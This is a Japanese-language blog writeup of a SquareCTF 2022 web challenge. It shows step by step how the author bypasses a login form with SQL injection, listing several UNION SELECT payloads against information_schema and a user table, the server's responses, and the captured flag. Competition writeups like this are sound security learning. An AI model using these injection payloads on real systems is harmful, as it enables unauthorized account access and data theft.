<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>SquaareCTF 2022 Writeup - CTF フラxxグゲット</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="CaptureAmerica @ CTF フラxxグゲット" /><meta name="description" content="Save The Earth! - 地球環境を守ろう！ URL: https://2022.squarectf.com/challenges （最近、ちょくちょくCTFイベントに参加しているんですが、全然解けない事が多いです。。。全体的に難易度あがって" /><meta name="keywords" content="CTF, Writeup, captureamerica, picoCTF" />



<meta name="google-site-verification" content="PqctLWZQttGzxXVupWuIt2HWuBI8cvN1z07ETpxA2dw" />


<meta name="generator" content="Hugo 0.74.2 with theme even" />


<link rel="canonical" href="https://captureamerica.github.io/writeups/post/squarectf_2022/" />
<link rel="apple-touch-icon" sizes="180x180" href="https://captureamerica.github.io/writeups/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://captureamerica.github.io/writeups/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://captureamerica.github.io/writeups/favicon-16x16.png">
<link rel="manifest" href="https://captureamerica.github.io/writeups/manifest.json">
<link rel="mask-icon" href="https://captureamerica.github.io/writeups/safari-pinned-tab.svg" color="#5bbad5">



<link href="https://captureamerica.github.io/writeups/sass/main.min.2e81bbed97b8b282c1aeb57488cc71c8d8c8ec559f3931531bd396bf31e0d4dd.css" rel="stylesheet">



<meta property="og:title" content="SquaareCTF 2022 Writeup" />
<meta property="og:description" content="Save The Earth! - 地球環境を守ろう！ URL: https://2022.squarectf.com/challenges （最近、ちょくちょくCTFイベントに参加しているんですが、全然解けない事が多いです。。。全体的に難易度あがって" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://captureamerica.github.io/writeups/post/squarectf_2022/" />
<meta property="article:published_time" content="2022-11-20T15:00:00+09:00" />
<meta property="article:modified_time" content="2022-11-20T15:00:00+09:00" />
<meta itemprop="name" content="SquaareCTF 2022 Writeup">
<meta itemprop="description" content="Save The Earth! - 地球環境を守ろう！ URL: https://2022.squarectf.com/challenges （最近、ちょくちょくCTFイベントに参加しているんですが、全然解けない事が多いです。。。全体的に難易度あがって">
<meta itemprop="datePublished" content="2022-11-20T15:00:00&#43;09:00" />
<meta itemprop="dateModified" content="2022-11-20T15:00:00&#43;09:00" />
<meta itemprop="wordCount" content="620">



<meta itemprop="keywords" content="CTF," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="SquaareCTF 2022 Writeup"/>
<meta name="twitter:description" content="Save The Earth! - 地球環境を守ろう！ URL: https://2022.squarectf.com/challenges （最近、ちょくちょくCTFイベントに参加しているんですが、全然解けない事が多いです。。。全体的に難易度あがって"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="https://captureamerica.github.io/writeups/" class="logo">CTF Writeups</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="https://captureamerica.github.io/writeups/">
        <li class="mobile-menu-item">Home</li>
      </a><a href="https://captureamerica.github.io/writeups/post/">
        <li class="mobile-menu-item">Archives</li>
      </a><a href="https://captureamerica.github.io/writeups/tags/">
        <li class="mobile-menu-item">Tags</li>
      </a><a href="https://captureamerica.github.io/writeups/categories/">
        <li class="mobile-menu-item">Categories</li>
      </a><a href="https://captureamerica.github.io/writeups/about/">
        <li class="mobile-menu-item">About</li>
      </a>
  </ul>

  


</nav>

  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="https://captureamerica.github.io/writeups/" class="logo">CTF Writeups</a>
</div>





<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="https://captureamerica.github.io/writeups/">Home</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://captureamerica.github.io/writeups/post/">Archives</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://captureamerica.github.io/writeups/tags/">Tags</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://captureamerica.github.io/writeups/categories/">Categories</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://captureamerica.github.io/writeups/about/">About</a>
      </li>
  </ul>
</nav>

    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">SquaareCTF 2022 Writeup</h1>

      <div class="post-meta">
        <span class="post-time"> 2022-11-20 </span>
        <div class="post-category">
            <a href="https://captureamerica.github.io/writeups/categories/ctf/"> CTF </a>
            </div>
        
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#web-alex-hanlon-has-the-flag-50-points">[Web]: Alex Hanlon Has The Flag! (50 points)</a>
      <ul>
        <li><a href="#challenge">Challenge</a></li>
        <li><a href="#solution">Solution</a></li>
      </ul>
    </li>
  </ul>
</nav>
  </div>
</div>
    <div class="post-content">
      <img src="https://captureamerica.github.io/writeups/img/green_bar.png" alt="green_bar.png">
<img src="https://captureamerica.github.io/writeups/img/10_Nature_Themed_Icons_Cute_Earth_Icon.png" alt="Save The Earth!"> <b><font color="teal">Save The Earth! - 地球環境を守ろう！</font></b> <img src="https://captureamerica.github.io/writeups/img/10_Nature_Themed_Icons_Cute_Earth_Icon.png" alt="Save The Earth!">
<img src="https://captureamerica.github.io/writeups/img/green_bar.png" alt="green_bar.png">
<div class='align-right'>
<a href="https://translate.google.com/translate?hl=en&sl=ja&tl=en&u=https%3A%2F%2Fcaptureamerica.github.io%2Fwriteups%2Fpost%2Fsquarectf_2022%2F">
<img src="https://captureamerica.github.io/writeups/img/En.png" alt="English">
</a>
</div>
<p>URL: <a href="https://2022.squarectf.com/challenges">https://2022.squarectf.com/challenges</a>
<br /><br /></p>
<p>（最近、ちょくちょくCTFイベントに参加しているんですが、全然解けない事が多いです。。。全体的に難易度あがってません？？）</p>
<br>
えーっと、50点のチャレンジ2つと、Sanity Checkを1問解いただけです。
<p>101点を獲得し、最終順位は250位でした。<br /></p>
<img src="https://captureamerica.github.io/writeups/img/squarectf_2022_score.png" alt="squarectf_2022_score.png">
<p><br><br></p>
<p>とりあえず、記念に一個だけ、writeupを残しておきます。</p>
<p><br /><br />
<br /><br /></p>
<h2 id="web-alex-hanlon-has-the-flag-50-points">[Web]: Alex Hanlon Has The Flag! (50 points)</h2>
<hr>
<h3 id="challenge">Challenge</h3>
<blockquote>
<p>Alex Hanlon has saved the flag in his account! See if you can figure out his username and then login as him. But just know that it will be impossible to brute force his password.
<br /><br />
<a href="http://chals.2022.squarectf.com:4102">http://chals.2022.squarectf.com:4102</a></p>
</blockquote>
<br>
<h3 id="solution">Solution</h3>
<p>UsernameとPasswordが入力できるログインフォームが表示されます。</p>
<p><br />
Usernameに<code>alex</code>、PasswordにテキトーなSQLiのパターンを入れたときに、</p>
<pre>
Sorry, admin is the wrong user
</pre>
<p>というエラーが返ります。<code>admin</code>なんて入力してないのに。。</p>
<p><br /></p>
<p>実は、次に出てくるチャレンジ「Going In Blind」のDescriptionに、<code>Ok, the developers got smart, and figured out a way to prevent SQLi in the login page. Plus, they decided the flag shouldn't be hardcoded in the web application anymore. </code> という記載があって、それもヒントになってますね。</p>
<p>おそらく、内部的に以下のようになっているっぽいです。</p>
<pre>
SELECT * FROM user WHERE username = 'admin' and PASSWORD = '$password'
</pre>
<p><br /><br />
ここからはトライ＆エラーです。</p>
<p>入力値：</p>
<pre>
' union select 1, schema_name, 3 from information_schema.schemata;-- -
</pre>
<p>結果：</p>
<pre>
java.sql.SQLException: The used SELECT statements have a different number of columns
</pre>
<p><br /><br /></p>
<p>入力値：</p>
<pre>
' union select schema_name from information_schema.schemata;-- -
</pre>
<p>結果：</p>
<pre>
Sorry, information_schema is the wrong user
</pre>
<p><br /><br /></p>
<p>入力値：（テーブル名とカラム名は完全なGuessです）</p>
<pre>
' union select username from user where id = 1;-- -
</pre>
<p>結果：</p>
<pre>
java.sql.SQLSyntaxErrorException: Unknown column 'id' in 'where clause'
</pre>
<p><br /><br /></p>
<p>入力値：</p>
<pre>
' union select username from user where username like 'al%';-- -
</pre>
<p>結果：</p>
<pre>
Nope, try again!
</pre>
<p><br /><br /></p>
<p>入力値：</p>
<pre>
' union select username from user where username <> 'admin';-- -
</pre>
<p>結果：</p>
<pre>
flag{470bbbc0519e4bc6987bb00bef24a97a}
</pre>
<p><br /><br /></p>
<p>Flag: <code>flag{470bbbc0519e4bc6987bb00bef24a97a}</code></p>
<p><br /><br />
<br /><br /></p>
<hr>
<p><br /><br />
<br /><br /></p>

    </div>

    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">Author</span>
    <span class="item-content">CaptureAmerica @ CTF フラxxグゲット</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">LastMod</span>
    <span class="item-content">
        2022-11-20
        
    </span>
  </p>
  
  
</div>
<footer class="post-footer">
      <div class="post-tags">
          <a href="https://captureamerica.github.io/writeups/tags/ctf/">CTF</a>
          </div>
      <nav class="post-nav">
        
        <a class="next" href="https://captureamerica.github.io/writeups/post/learnone_completed/">
            <span class="next-text nav-default">LearnOne (OSCP) completed</span>
            <span class="next-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        

  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="https://github.com/CaptureAmerica/" class="iconfont icon-github" title="github"></a>
  <a href="https://captureamerica.github.io/writeups/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  

  <span class="copyright-year">
    &copy; 
    2019 - 
    2022<span class="heart"><i class="iconfont icon-heart"></i></span><span>CaptureAmerica @ CTF フラxxグゲット</span>
  </span>
</div>

    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  



<script type="text/javascript" src="https://captureamerica.github.io/writeups/js/main.min.c12618f9a600c40bd024996677e951e64d3487006775aeb22e200c990006c5c7.js"></script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-104910699-2', 'auto');
	ga('set', 'anonymizeIp', true);
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>







</body>
</html>
